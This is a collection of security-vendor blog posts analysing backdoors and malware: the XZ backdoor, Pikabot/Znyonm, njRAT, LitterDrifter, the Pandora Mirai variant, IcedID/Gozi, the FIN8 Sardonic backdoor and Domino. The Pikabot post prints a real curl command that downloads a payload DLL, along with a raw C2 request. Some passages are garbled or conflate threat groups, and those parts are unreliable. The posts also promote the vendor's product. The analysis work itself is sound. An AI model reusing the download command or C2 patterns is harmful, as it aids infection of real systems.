Backdoor in XZ Compromised Numerous Linux Systems

The story around the backdoor in XZ data compression tool is nothing short of marvelous, from both ends, and may probably be screened in future. A guy under the nickname Jia Tan was making his way to the status of project administrator since 2021. Typically for any tech savvy open-source project user, he started offering his fixes for bugs and new functions. Allegedly by creating a huge number of bug reports, the guy forced the manager to seek for an aide, with Jia being the best candidate at that moment.

This long road was needed to hide a tiny, deeply concealed backdoor (CVE-2024-3094) that is not even available from the public GitHub repository. The catch actually hides within the version that goes to the dependent project, mainly major Linux distributions. Files responsible for the backdoor initiation appear as test ones. This explains why it took so long: to avoid detection, Jia Tan was forced into adding each piece gradually, making it look like a development routine. A proper special operation, one may say.

The resulting flaw allowed for the unauthenticated SSH access to any machine. The only condition here is the infected XZ package and SSH usage. This, in turn, endangers thousands of servers that system administrators quite commonly connect through this protocol. Linux is a backbone of cloud servers, and having such a backdoor access effectively means leaking all the data they store.

More of the special operation things surfaced during the ongoing investigation. Shortly after Jia pushed the malicious fixes, numerous XZ update requests popped up in feedback hubs of different Linux distributions. Investigators suppose that either Jia Tan or his associates posted these comments. Some of the distros adhered to them and pulled the infected version, effectively installing the malware into their product.

How Was It Discovered?

The way the backdoor was discovered, on the other hand, sounds more like a miracle. Andres Freund, the developer, noticed that the SSH authentication takes 500ms longer than usual. Also, the operation started taking more CPU power than it used to, which intrigued Anders to search for a new bug. Searches quickly led him to the updated XZ version, and consequently to the backdoor built into it.

Andres Freund released his notification regarding the malicious changes on March 29, 2024. It is still unclear how long these changes were live, but Linux distributions were using them in release versions since early March. Among them are the following distros and versions:

Mitigations and Fixes

Upon discovering the backdoor code, the project maintainers instantly took down the GitHub repository. Though, further research showed that there was no need for this. As I’ve mentioned, malicious code was hidden in test files, mainly used in dependent projects like distributions. This, however, did not make the task any easier.

Together with the developers and maintainers of affected distros, Andres Freund elaborated both the list of affected versions and possible mitigations. Users should downgrade to the versions that do not contain malicious code, or upgrade to ones where it is already gone. At the same time, the investigation keeps going, as this supply chain attack can have more severe effects.

The post XZ Utils Backdoor Discovered, Threating Linux Servers appeared first on Gridinsoft Blog.

Trojan:Win32/Znyonm Detection Overview

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually the one that uses deep obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Others can also be seen though, as Microsoft does not attach this detection name to specific malware families, but rather to its properties.

The primary objectives of Znyonm include facilitating remote access or deploying additional payloads. As a preliminary stage, it establishes persistence within systems, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen the usage of multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This allows it to bypass antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the sample of Znyonm to analyze, I’ve picked one of fresh samples of Pikabot. This is a modular backdoor malware that emerged in early 2023. The malware gained prominence as a substitute for the infamous QakBot. The malware serves as an initial access point in high-profile cyberattacks. Its primary tactic for initial access is spear phishing and thread-hijacking techniques. Pikabot deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; frauds particularly employ thread hijacking to make it look genuine. The format of the attachment may vary – from a PDF document to a ZIP archive that contains the payload. In either case, email text will try to convince the user to launch the attachment and follow its instructions.

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis, by calling NtQueryInformationProcess. Then, it decrypts the DLL file and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrives in. To gain persistence and privileges, Pikabot/Znyonm performs process hollowing.

C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot malware avoids detection by directly calling the required APIs using their hash for the first 3 APIs. Next, it switches to dynamic API resolution to evade EDR/XDR detection. The malware checks the system language before gathering system information, ceasing execution if one from the ban list is found. After passing the check, it collects system properties to fingerprint the system.

The fingerprint includes user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its process. This is a typical set of data for backdoor malware, called to distinguish one system from another. Some backdoors though were gaining the ability to collect more data with time, getting closer in functionality to spyware.

C2 Communication

The malware sends collected data to the command server using an HTTP POST request over HTTPS protocol. Upon the first contact, the command server sends the response with the command and configuration info. The latter consists of a command-specific code, URL, file address, and the action malware should execute. Some of the commands also require Pikabot to send the results to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about Trojan:Win32/Znyonm detection, an anti-malware scanning is needed. As you can see from the analysis above, Znyonm is nothing to mess around with, and can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal. Launch a Full scan and let it finish – it will take care of every dangerous thing present in your system.

The post Trojan:Win32/Znyonm appeared first on Gridinsoft Blog.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for njRAT malware, that is categorized as backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, and before attacking, it allows hackers to pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

Such customization enables njRAT to circumvent many static checks called to avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect and obviously stand for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Data Collection & Other Functionality

After finalizing the preparations, njRAT a.k.a Bladabindi performs some basic callouts to the command server. Depending on the response, malware can switch to the idle, start collecting user data or pull the additional payload from the remote server. The overall list of actions it can perform is the following:

• Executing remote shell commands
• Downloading and uploading files
• Capturing screenshots
• Logging keystrokes
• Camera and microphone access
• Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that antivirus often adds “!ml” to the end of its name – to indicate the use of the AI detection system. Although it is a highly effective method, without the confirmation from other detection systems, it is easy to make it generate false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware, it is best to detect and remove even the sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

The post Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

Who are Gamaredon?

Gamaredon’s unique profile goes beyond its commitment to espionage goals. The Security Service of Ukraine (SSU) has linked Gamaredon personnel to the Russian Federal Security Service (FSB), adding a geopolitical twist to the group’s activities. The FSB, responsible for counterintelligence, antiterrorism, and military surveillance, sheds light on the strategic and state-sponsored nature of Gamaredon’s operations. Despite the ever-changing landscape of its targets, Gamaredon’s infrastructure exhibits consistent patterns, emphasizing the need for careful scrutiny from cybersecurity experts.

What is LitterDrifter?

One of Gamaredon’s tools – the notorious USB-propagating worm, LitterDrifter. This VBS-written malware showcases Gamaredon’s adaptability and innovation. Despite the old name of malware type, it packs quite a lot of functions much needed in modern cyberattacks.

As a part of the APT’s infrastructure, LitterDrifter introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter adds to the overall potential of the threat actor in globe-scale cyberattacks.

The key functionality of LitterDrifter worm circulates around being the remote access tool. In other words, it is a backdoor with worm-like self-spreading capabilities. It is a hidden unauthorized access point in a computer system, software, or network that allows accessing the target environment. In cyberattacks, backdoors mostly act as initial access and reconnaissance tools, which then “open the gates” for further malware injection.

LitterDrifter doesn’t just spread automatically over USB drives. It introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter highlights the broader threat it poses to cybersecurity worldwide.

Gamaredon’s Campaign Against Ukraine

Gamaredon Group has exhibited a sustained and targeted cyber espionage campaign against Ukraine and its institutions. It includes military, non-governmental organizations (NGOs), judiciary, law enforcement, and nonprofit entities since at least 2013. The group, suspected to have ties to Russian cyber espionage efforts, has consistently focused on infiltrating Ukrainian entities. It is evident in its choice of Ukrainian language lures and primary targets within the region.

LitterDrifter emerges as yet another tool employed by the group in its multifaceted cyber operations. As revealed through ongoing monitoring and analysis researchers, Gamaredon has utilized LitterDrifter alongside various other techniques and malware to achieve its objectives. This has further strengthened the group’s status as a advanced persistent threat against Ukrainian and allied interests.

Protection against LitterDrifter

As LitterDrifter reveals its global impact, it prompts a call for a unified and fortified global cybersecurity defense. The worm’s ability to transcend borders underscores the importance of international collaboration in addressing and mitigating cyber threats.

Protecting from threats like LitterDrifter requires a combination of proactive cybersecurity practices and vigilance. Here are some recommendations to enhance your protection against such worms:

• Be cautious when inserting USB drives into your computer, especially if they are from unknown or untrusted sources. Consider using USB drives that have read-only switches to prevent unauthorized writing.
• Regularly back up your important data and store backups in a secure location. In the event of a ransomware attack, having recent backups can help you restore your system without paying the ransom.
• Follow security best practices such as using strong, unique passwords, enabling two-factor authentication, and limiting user privileges. These practices can add layers of protection against various cyber threats.
• Keep yourself informed about the latest cybersecurity threats and vulnerabilities. Being aware of the evolving threat landscape enables you to adapt your security measures accordingly.

The post LitterDrifter – Russia’s USB Worm Targeting Ukrainian Entities appeared first on Gridinsoft Blog.

The campaign targets low-cost Android TV boxes such as Tanix TX6, MX10 Pro 6K, and H96 MAX X3. These devices have quad-core processors that can launch powerful DDoS attacks, even in small swarm sizes.

Mirai Botnet Aims Android-based TV Boxes

Mirai Botnet can infect devices via malicious firmware updates signed with publicly available test keys or malicious apps. Which undoubtedly distributed on domains that target users interested in pirated content. In the first case, firmware updates are either installed by resellers of the devices or users are tricked into downloading them from websites. Then, they promise unrestricted media streaming or better application compatibility.

The ‘boot.img‘ file contains the kernel and ramdisk components loaded during Android boot-up. It makes it an excellent persistence mechanism for the malicious service.

The second distribution channel involves the use of pirated content apps. They also offer access to collections of copyrighted TV shows and movies for free or at a low cost. Security experts have identified Android apps that spread the new Mirai malware variant to infected devices. Here is an example:

In this case, the malicious apps surreptitiously start the ‘GoMediaService‘ during the initial launch and set it to auto-start when the device boots up.

When the ‘gomediad.so‘ service is called, it unpacks multiple files, including a command-line interpreter that runs with elevated privileges (‘Tool.AppProcessShell.1‘) and an installer for the Pandora backdoor (‘.tmp.sh‘).

After being activated, the backdoor establishes communication with the C2 server, and replaces the HOSTS file. After that, it updates itself and then enters standby mode, waiting for instructions from its operators. The malware can launch DDoS attacks using the TCP and UDP protocols, such as generating SYN, ICMP, and DNS flood requests. It can also open a reverse shell, mount system partitions for modification, and perform other functionalities.

IoC Mirai Botnet

• Malware.U.Mirai.tr: 96b087abf05bb6c2c1dd6a1c9da460d57564cc66473ca011f85971752a112ce1
• Malware.U.Mirai.bot: 52a9207498821af8cffc629b19c18dc40b7512a56b13c8b32db6bdc009e0a422
• Malware.U.Mirai.bot: 5397ccdd490dc61f64a07968c283d21b76f87ad4c58cd19481f215fdf6aeeaa1
• Malware.U.Mirai.bot: 624f4966636968f487627b6c0f047e25b870c69040d3fb7c5fb4b79771931830
• Malware.U.Mirai.bot: 9936b597954aa7e1e7ef82c09bc3c039a239c3cd77ff7af5a079064138c467b0
• Malware.U.Mirai.bot: de883fb217df507b1acb5bbe637d5e8d19ac989b9e78242f7c22bae58c0f408c
• Malware.U.Mirai.bot: 78b477ae2bbaf19cf180aad168da4c84354140762ac33903bc40124be8d055da
• Malware.U.Mirai.bot: 613f03b52910acb8e25491ca0bfe7d27065221c180e25d16e7457e4647a73291
• Malware.U.Mirai.bot: 22f269a866c96f1eec488b0b3aebe9f8024ae455255a4062e6a5e031dfd16533

What devices are at risk?

Budget-friendly Android TV boxes often have an uncertain journey from manufacturer to consumer. It leaves the end-user unaware of their origins, potential firmware modifications, and the various hands they’ve been through.

Even cautious consumers who retain the original ROM and are selective about app installations face a lingering risk of preloaded malware on their devices. It is advisable to opt for streaming devices from trusted brands like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.

Safety recommendations

For Android TV users, installing apps only from the official app store is advisable. It is also essential to pay attention to the permissions requested by the app. If your app requests access to your phonebook and geo-location, it is best to avoid using it as it could be malware. Additionally, it is crucial not to download or install any hacked apps, as their contents are often infected with malware of some kind.

The post Mirai variant “Pandora” infects Android TV for DDoS attacks. appeared first on Gridinsoft Blog.

How does malvertising work?

Malvertising is an attack where malicious code is inserted into legitimate online advertising networks. This code usually leads users to harmful websites.

Some malicious actors create fake websites that mimic legitimate software sites, using tactics like typosquatting (using misspelled versions of well-known brand and company names as their URL) or combosquatting (combining popular names with random words for their URL). This makes the fake sites appear legitimate to unsuspecting users, as their domain names reference the original software or vendor. The fake web pages are designed to look identical to the real ones, and the threat actors pay to promote the site through search engines to boost its visibility.
Fake WinRar ad on Google

Google has a vast user base, processing over 8 billion daily queries. This makes their search results one of the largest advertising networks available. Unfortunately, a single malicious ad can potentially be viewed by millions of people, causing thousands to click on it. The situation worsens exponentially when at least ten topics contain negative Google ads.

BatLoader as malware loader

BatLoader is a type of malware that enables cybercriminals to download more advanced and harmful malware onto a targeted system. The batch script can download two specific types of malware: IcedID, and Gozi/Ursnif, a backdoor.

It’s worth noting that the BatLoader campaign is still using malvertising, unlike IcedID. What’s particularly interesting is that there has been a shift in the type of users being targeted. While malicious ads previously targeted those searching for IT tools in late 2022 and early 2023, more recent campaigns now use AI-related lures to target users searching for devices such as Midjourney and ChatGPT.

IcedID Malware

IcedID (a.k.a BokBot) is a type of malware that was first discovered in 2017 and classified as both a banking Trojan and a remote access Trojan (RAT). Experts say IcedID is as powerful as other advanced banking Trojans like Zeus, Gozi, and Dridex. To infect a system, IcedID relies on other malware like Emotet to get initial access. Once it’s in, IcedID can steal financial information and even drop malware like ransomware. It’s also capable of moving through a network with ease.

The group called Shatak often sends phishing emails to spread malware called IcedID. They attach Microsoft Office documents with macros, .iso files, or encrypted .zip archives. Once the malware infects a system, it searches for the best way to spread and gain control. It does this by looking for a way to install itself without being detected and then waits for the system to reboot before activating its main module. By doing this, IcedID can blend in with legitimate processes, making it harder to detect.

Gozi backdoor/banking trojan

URSNIF, the malware known as Gozi that attempts to steal online banking credentials from victims’ Windows PCs, is evolving to support extortionware. This banking trojan has been around since the mid-2000s and is one of the oldest. It has multiple variants and has been known by names such as URSNIF, Gozi, and ISFB. These are the most effective methods for protecting yourself from attack: encountering other malware families, and its source code has been leaked twice since 2016. According to malware analysts, it is now considered a “set of related siblings” rather than a single malware family.

Malware Mitigation and Prevention

Detecting and mitigating malvertising attacks can be challenging, and both end users and publishers must take action to combat this threat. Implementing a comprehensive cybersecurity program at the enterprise level is the best way to protect against malvertising. Organizations can reduce their risk of falling victim to these attacks by taking appropriate precautions.

These are the most effective methods for protecting yourself from attack:

• Antivirus software can protect certain types of threats, such as drive-by downloads or malicious code that malvertising may execute.
• Ad blockers can provide adequate protection against malvertising since they block all ads and their potentially harmful components.
• By updating your browser and plugins, you can prevent numerous malvertising attacks, especially the ones that occur before the user clicks on an advertisement.
• It is recommended to prioritize critical systems and implement Zero Trust solutions whenever feasible.
• Implementing multi-factor authentication for all essential services, particularly online banking and cryptocurrency accounts, is advisable.
• It is recommended to conduct user awareness training to educate employees about phishing techniques. Additionally, it is advisable to establish standard operating procedures (SOPs) for dealing with suspicious emails and documents.

Knowing standard social engineering tactics like phishing and malspam techniques to detect malware attacks is essential. While network traffic analysis can help see known versions of malware after infection, developers frequently update their malware with new methods to evade detection. This makes reliably detecting malware infections difficult without advanced endpoint protection products.

The post Gozi and IcedID Trojans Spread via Malvertising appeared first on Gridinsoft Blog.

Who are FIN8 a.k.a “Syssphinx”?

There is a financially motivated cybercrime group known as FIN8 or “Syssphinx” with a reputation for targeting various organizations without discrimination. They have been known to target companies in industries such as chemicals, entertainment, finance, hospitality, insurance, retail, and technology.

The malicious group FIN8 uses spear phishing and social engineering tactics to target victims while employing living-off-the-land techniques to conceal their activities. Recently, researchers discovered a new version of the Sardonic backdoor, initially identified by Bitdefender in 2021. Although the latest version is more extensive and has some differences, it may not necessarily be an improvement overall. The researchers noted that some of the changes seem unnatural and could be an attempt by the threat actors to avoid detection by disguising similarities with previous versions.

Updated Sardonic Backdoor Malware

Some hackers might update their malware after it has been discovered. Same happened with Sardonic in 2021, to bypass cybersecurity measures designed to detect it. The researchers found that the new Sardonic backdoor is very similar to the previous one. But it has many code changes that give it a unique look. However, these changes were not arbitrary. The updated version has added support for more plugin formats, which provides attackers with more options and enhances their abilities.

Experts have analyzed a new Sardonic backdoor variant written in C instead of C++, which was used for the previous variant. This backdoor was found to be embedded indirectly into a PowerShell script that is used to infect target machines. Unlike the last variant, this new variant doesn’t use an intermediate downloader shellcode to download and execute the backdoor.

This script in PowerShell decodes a binary file for .NET Loader and then loads it into the current process. The loader will then decrypt and execute both the injector and the backdoor.

According to the researchers, the backdoor allows attackers to have interactive control over the infected system through processes such as cmd.exe. They analyzed a sample that showed the backdoor can support up to 10 simultaneous sessions. Additionally, the backdoor has three different formats to expand its capabilities: PE DLL plugins, shellcode, and shellcode, with a unique approach for passing arguments.

A sardonic backdoor can execute multiple commands, including dropping files from the attacker, sending the contents to the attacker, loading a DLL plugin provided by the attacker, and running the shell code supplied.

FIN8 and Ransomware Operations

Although FIN8 was known for focusing on point-of-sale (POS) attacks, in recent years, the group has been utilizing various ransomware threats as part of its attacks. Operations with ransomware are not something new for that group. The only difference here is the name of the final payload – Noberus. Noberus is, in fact, a well-known ransomware. It is a strain used generally by ALPHV/BlackCat (a.k.a FIN7) extortion gang.

Noberus has several features that enhance its superiority over rival ransomware. These include providing an entrance through a unique onion domain architecturally excluding all possible connections with forums in the affiliate program. This makes it impossible for attackers to reveal the actual IP address of the server even if they obtain a full-fledged command line shell and encrypted negotiation chats that the intended victim can access.

The ransomware had two encryption algorithms available, ChaCha20 and AES, and four encryption modes – Full, Fast, DotPattern, and SmartPattern. The Full mode is the most secure but also the slowest. SmartPattern encrypts a certain amount of data in percentage increments. It defaults to encrypting 10 megabytes of every 10 percent of the file beginning from the header, making it the ideal mode for attackers regarding speed and cryptographic strength.

It’s just the beginning

The group FIN8 is constantly enhancing its abilities and infrastructure for delivering malware. They frequently refine their techniques to avoid being detected. Their recent shift from point-of-sale attacks to ransomware shows their commitment to maximizing profits from their victims. The Researchers share the tools and tactics this financially-focused threat actor uses, emphasizing their ongoing danger to organizations.

How to defend against organized cybercrime?

To protect against the ever-changing malware of FIN8, we suggest implementing a defense-in-depth strategy that involves using multiple layers of detection and protection tools and incorporating multi-factor authentication (MFA) and access controls.

Organizations can consider implementing one-time credentials for administrative work to prevent theft and misuse of admin credentials. It’s also a good idea to create usage profiles for admin tools, as attackers often use them to move undetected through a network.

The post FIN8 Updated Sardonic Backdoor to Deliver Noberus Ransomware appeared first on Gridinsoft Blog.

njRAT Hides in Trojanized TeamViewer App

For some reason, people show high levels of trust towards downloading links they’re given on various forums or other thematic communities. This is where the major share of trojanized installers are spread. Cybercriminals, or even users they pay for spreading offer this installer as a “hacked full version” of the well-known remote access tool. As it allows for some functions absent in a free version, and folks are exceptionally eager for any free stuff, they inevitably stick to this crack. And, as it often happens, using the crack ends up with some really bad things.

The installer I am talking about looks like a legit thing – neither its name, nor the size calls any suspicion. However, upon execution, it drops two files: the legitimate TeamViewer app installer and an item called “TeamViewer Starting.exe”. This, exactly, is a payload, specifically njRAT – an infamous remote-access trojan from 2013. Then the forged installer runs a legit TeamViewer app, to make the victim think everything is OK.

What is njRAT?

njRAT, also known under the name of Bladabindi, is an old-timer of the malware scene. It appeared almost a decade ago, while some analysts trace it even further in the past – to 2012. Such a long life is already a mark of success, and there are a couple of things going for it.

Being a classic remote access trojan, njRAT manages to conjoin the functionality of a stealer with the one of a backdoor. It grants its masters access to the infected system, which is already beneficial. Commanding to send requests to a target server, using the machine as a dummy for malicious operations, rummaging through the files in a manual mode – cybercriminals are ready to pay for that. And with an extensive botnet, you can do nothing but count money for leasing it to other crooks.

Though that is only one side of njRAT dirty deeds. As I said, it can act as an infostealer, grabbing passwords and logging keystrokes. It particularly targets cryptocurrency wallets, both desktop and ones present as browser add-ons. This appears to be a modern trend – and it would be shortsightedly to ignore it. Stealers that started in 2018 adopted this feature in progress, and njRAT did so as well.

One more thing this malware is distinctive for is detection evasion methods. Aside from heavy obfuscation that is a must-have in modern malware, it also employs hooking itself to critical system processes. This prevents users – and some antiviruses – from stopping the process. Moreover, it seriously disguises the malware, as it hides among system processes rather than user ones in the Task Manager.

How to protect your system in such situations?

Well, there is one major thing that makes this malware spreading campaign happen is users’ trust towards software advised on third-party websites and overall – software cracks. If you would not stick to downloading TeamViewer from warez sites and forums, you would not face njRAT running in your system – that’s plain and simple. Though, there are several other tips that will help you to prevent any infections, regardless of their source.

Use a great anti-malware program. To be sure it will protect you from the trickiest malware samples, choose one with a heuristic system. It allows for detecting threats by their behaviour, thus any obfuscations or mimicking the system processes are useless. GridinSoft Anti-Malware is one that can offer such a feature – consider trying it out.

Use licensed software. Trojanized TeamViewer is just one example of possible malware injection into the programs you get from unofficial sources. Paying for a licence is always less expensive and unpleasant than sorting out the consequences of spyware/backdoor activity. If there is no way to get the program from an official source (a common situation with abandonware) be sure to scan it with anti-malware software before launching.

Keep an eye on cybersecurity news. This is cherry-on-top advice, that does not change much, but will surely help you to know where the traps are. Malicious Google ads, fake installers, email spam campaigns that convincingly mimic legit mailings – awareness sometimes can save you better than any reactive measures.

The post Trojanized TeamViewer Installer Spreads njRAT appeared first on Gridinsoft Blog.

Who are Conti and FIN7?

First of all, let’s explain why the presence of actors from FIN7 and the ceased Conti gang is so noteworthy. FIN7 is a cybercrime gang that likely operates from Russia and Ukraine. It is also known under the names of Carbanak (after the backdoor they use), ITG14 and ALPHV/BlackCat. They are most notorious for collaborations with widely-known threat actors, like Ruyk and REvil ransomware, and the release of their own ransomware, called ALPHV. It is still running, and had a couple of noteworthy attacks the past year.

Conti is a similar and different story simultaneously. They have built their image around an eponymous ransomware sample. Same as FIN7, this group of cybercriminals consists of actors from ex-USSR countries. However, the start of the war in February 2022 led to a quarrel among the group’s top-management and further publication of its source code. That, eventually, led to the group’s dissolution. Previous to these events, Conti was a prolific ransomware gang with a major share on the market.

Their collaboration is an expected thing. Nature abhors a vacuum, so after the gang breakup its members promptly joined other groups, or started new ones. However, the collaboration with other gangs on the creation of brand-new malware is a pretty outstanding case. That may be a great start of a new character on the scene, a new threat actor, or just a powerful boost to the FIN7 gang.

Domino Backdoor Description

Domino is a classic example of a modern backdoor that is capable of malware delivery. It is noticed for spreading a separate malware dropper, coined Domino Loader. The former provides only remote access to the targeted system, while the latter serves for malware deployment. This duo is spotted for being used in a pretty unique multi-step malware spreading campaign.

Dave Loader is a classic dropper malware example – the one which serves only to deliver other malware. Its presence in this scheme, however, gives an interesting clue about the possible relations between Domino and Conti ransomware gang. The infection proceeds with the delivery of Domino backdoor and, in a quick succession, its dropper module. Then, at the final stage, Domino drops a Project Nemesis stealer. The latter aims generally at credentials from social networks, VPN clients and cryptocurrency services.

Why, Exactly, a Collaboration?

The key things that point to the fact that Domino backdoor is a collaboration rather than a stand-alone development is the use of Dave Loader as a delivery way, and sharing certain code elements with FIN7’s brainchild Lizar Malware. Dave is an internal product of Conti gang, used exclusively in its cyberattacks. It never leaked, contrary to the Conti ransomware code, thus there’s no way that a third party uses it. Lizar Loader a.k.a Tirion/DiceLoader, on the other hand, is an auxiliary malware used by FIN7. Domino malware shares major parts of code with this loader, including bot ID generation and data package encryption mechanisms. Moreover, the IPs range where Domino’s command servers are hosted is pretty close to the one FIN7 uses for their C2s; both ranges belong to MivoCloud hosting.

Domino Backdoor & Loader Analysis

Analysts from IBM Security Intelligence already got their hands on Domino samples, both backdoor and dropper. First things first – so let’s start from a backdoor.

Domino Backdoor

It arrives to the infected system as a C++ 64-bit DLL file. The form of DLL file makes it easier for crooks to perform a stealth execution. Droppers Domino generally rely on running it using the shellcode embedded into the payload retrieved from the command server. Once executed, Domino starts hashing the system data in order to generate a bot ID value. Primarily, it looks for username and system name; additionally, malware takes its process ID and adds it to the hash. Its final form looks like a648628c13d928dc-3250.

Hashing proceeds with further decryption of the Domino’s code. It carries an XOR-encrypted code in a data section of its binary; the 16-bit decryption XOR key is placed right before this section. This part contains not only further execution instructions, but also C2 communication data.

C2 Communications

To secure the data transfer, it generates a 32-bit key and uses an embedded RSA public key to encrypt it. This, however, is used only for an initial connection. After that, malware continues with collecting information about the system. For further C2 connections, the malware uses the AES-256-CBC key, which also comes into the initial package. Same as in the first case, Domino generates a public key on the run and uses it to cipher the data package.

It is also interesting how Domino backdoor picks the C2 address it will use as primary. By design, there are only two C2 addresses in the malware configuration section. If the parent system for the malware belongs to a domain (i.e. LAN or WAN), it uses the second IP as a primary. When the computer is stand-alone, Domino chooses the first one.

To guide the malware, C2 sends it a set of commands and a payload. Same as data that goes from the client, they are encrypted. Commands instruct not only about the action, but also about the preferred way to run the payload. The set of commands is like the following:

Domino Loader

Domino Loader resembles the Domino Backdoor in many ways, so the naming convention there is quite obvious. This malware uses the same methods of C2 requests encryption. However, the amount of data gathered about the system is way less; its capabilities are concentrated around retrieving and running the payload’s DLL. It uses an infamous ReflectiveDLLInjection project – a concept of DLL injection technique. This, however, is not the only possible way of the Loader operations – it can change its behaviour depending on the command from the C2 that comes as a supplementary to a payload. It most definitely depends on the form the payload arrives in.

The commands convention is pretty much the same as in the Domino Backdoor. A single-byte blob that precedes the payload indicates what exactly the malware should do. Aside from that, the payload is succeeded with a value that notifies malware about the preferred method of loading. If the value is >0, malware allocates memory within the process it runs in, and runs the DLL payload at the offset that equals the value. That method, actually, requires the aforementioned ReflectiveDLLInjection technique.

Value 0 corresponds to running the payload as a .NET assembly. This supposes calling for VirtualAlloc for memory allocation, and a PAGE_EXECUTE_READWRITE for securing this area. Assembly.Load function finishes the job by making the payload run.

Once the value is -1, Domino Loader runs a PE loading procedure. First, it allocates memory in its current process – same as in the case of DLL loading. Then, however, it copies the headers and sections to the newly allocated memory area, loads the imports of the PE file, and finally runs it. In this case, malware applies the offsets present within the payload PE sections.

Protection against Domino Backdoor/Domino Loader

This malware is rare enough, so it is quite hard to judge on its counteraction ways. Nonetheless, they are definitely needed, as it promises to be pretty dangerous. First and foremost sources of such instructions – spreading ways – are unclear. It may possibly become more obvious in future when Domino will see more popularity. Thus now only common steps may have significant efficiency.

Use a security solution that features a zero-trust protection policy. Only having no trusted programs at all you can be sure that your security tool will not miss a new cunning malware that hides behind a benign program. Zero-trust has its downsides, but they’re much less critical than a paralysed workflow after a ransomware attack.

Improve your network security. This is Domino-specific advice, as this malware features a pretty limited list of only two C2 servers. It may be changed in future, but currently it is not a big deal to block them. This, however, will be much easier to accomplish by having a Network Detection and Response solution. It automatically weeds out potentially malicious requests, and also offers a lot of analytics information. Stopping malware from contacting the C2 makes it useless, as it cannot deliver payloads and do other unpleasant things.

The post Domino Backdoor is Lead by FIN7 and Conti Actors appeared first on Gridinsoft Blog.

IceBreaker Backdoor exploits new phishing way

